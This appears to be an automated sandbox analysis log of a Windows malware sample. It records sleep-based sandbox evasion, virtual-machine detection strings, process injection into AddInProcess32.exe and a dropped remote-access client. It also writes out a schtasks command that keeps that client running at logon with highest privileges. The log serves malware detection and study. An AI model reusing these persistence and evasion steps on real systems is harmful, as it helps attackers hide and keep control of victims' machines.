Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33640s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33531s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33422s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33297s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33187s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -33078s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32968s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32845s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32719s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32609s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32500s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32390s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32281s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32171s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -32062s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31953s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31843s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31734s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31625s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31515s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31406s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31297s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31187s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -31078s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30968s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30859s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30750s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30640s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30531s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30421s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30312s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30201s >= -30000s
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe TID: 6172 Thread sleep time: -30092s >= -30000s
Source: C:\Users\user\AppData\Local\DNScache\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CD53130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CD53226h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4_2_0040F905 FindFirstFileExW
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11108090 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 9_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Local\DNScache\client32.exe Code function: 7_2_6CE76C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 35000
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34875
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34765
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34656
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34547
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34437
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34328
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34216
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 34094
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33984
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33872
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33750
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33640
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33531
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33422
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33297
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33187
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 33078
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32968
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32845
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32719
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32609
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32500
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32390
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32281
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32171
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 32062
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31953
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31843
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31734
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31625
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31515
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31406
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31297
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31187
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 31078
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30968
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30859
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30750
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30640
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30531
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30421
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30312
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30201
Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Thread delayed: delay time: 30092
                                Source: HTCTL32.DLL.4.drBinary or memory string: VMware
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                                Source: HTCTL32.DLL.4.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.4.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWho
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3181897720.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3182026604.000000000335E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2887216359.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303151526.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303309290.000000000337D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2887050426.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3301652835.000000000047E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3181897720.00000000032EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.4.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: HTCTL32.DLL.4.drBinary or memory string: VMWare
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\'
                                Source: client32.exe, 00000009.00000003.2889076833.00000000004FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_4-11183
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-119575
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-119073
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407884
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,7_2_110CF9F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE76C74 VirtualProtect ?,-00000001,00000104,?7_2_6CE76C74
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029200
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401000 lstrcmpA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,4_2_00401000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407884
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040D978 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040D978
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407A11 SetUnhandledExceptionFilter,4_2_00407A11
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00406F73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00406F73
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,7_2_11092090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_1115E3E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A469
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,7_2_11030A50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD628E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6CD628E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD687F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6CD687F5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE7ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,7_2_6CE7ADFC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE00807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_6CE00807
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,9_2_11092090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1115E3E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1116A469
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,9_2_11030A50
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 419000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 424000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 425000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 427000
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C4B008
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe | 7_2_1102FB50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe | 9_2_1102FB50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_00401A80 GetProcessHeap,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,GetProcessHeap,GetProcessHeap,HeapAlloc,GetSystemDirectoryW,HeapFree,GetProcessHeap,HeapAlloc,wsprintfW,GetProcessHeap,HeapAlloc,HeapFree,wsprintfW,ShellExecuteW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1110F530 GetKeyState,DeviceIoControl,keybd_event
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | Binary or memory string: Shell_TrayWnd
